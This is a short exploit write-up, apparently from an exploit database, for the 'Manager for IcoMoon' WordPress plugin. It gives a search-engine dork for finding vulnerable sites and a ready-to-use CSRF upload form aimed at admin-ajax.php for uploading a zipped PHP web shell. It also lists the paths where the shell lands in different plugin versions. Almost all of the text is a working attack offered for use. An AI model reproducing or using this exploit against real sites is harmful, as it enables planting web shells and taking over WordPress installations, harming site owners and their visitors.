Reference: Wordfence
Dork: inurl:/wp-content/plugins/manager-for-icomoon
Preparations:
- Shell compressed to zip (zip file which has your-shell.php inside)
- CSRF (down below)
CSRF
<form method="post" action="http://localhost/wp-admin/admin-ajax.php" enctype="multipart/form-data"> <input type="hidden" name="action" value="admin_menu"> <input type="file" name="managerforicomoon-zip"> <input type="submit" value="Upload" name="managerforicomoon-upload"> </form>* Upload your compressed zip shell
Uploaded file
Plugin version === 2.0: The uploaded file will be in /wp-content/uploads/manager-for-icomoon/shell.php
Plugin version > 2.0: The uploaded file will be in /wp-content/plugins/manager-for-icomoon/icomoon/shell.php
* Check plugin version: /wp-content/plugins/manager-for-icomoon/readme.txt